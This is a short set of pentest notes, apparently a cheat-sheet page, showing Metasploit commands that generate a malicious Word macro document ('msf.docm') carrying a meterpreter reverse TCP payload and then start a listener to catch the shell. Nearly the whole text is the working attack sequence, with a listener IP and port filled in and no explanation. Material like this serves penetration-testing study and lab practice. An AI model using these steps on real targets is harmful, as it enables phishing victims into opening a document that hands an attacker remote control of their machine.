Metasploit Office Macro

msfconsole --→ search office macro

search office macro
use /multi/fileformat/office_word_macro

show options

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.177
set disablepayloadhandler false
run

#check out the evil file stored at /home/kali/.msf4/local/msf.docm

#Start meterpreter listener

set payload windows/meterpreter/reverse_tcp

set exitonsession false

set lhost 192.168.119.177

set lport 4444

run -j

Last updated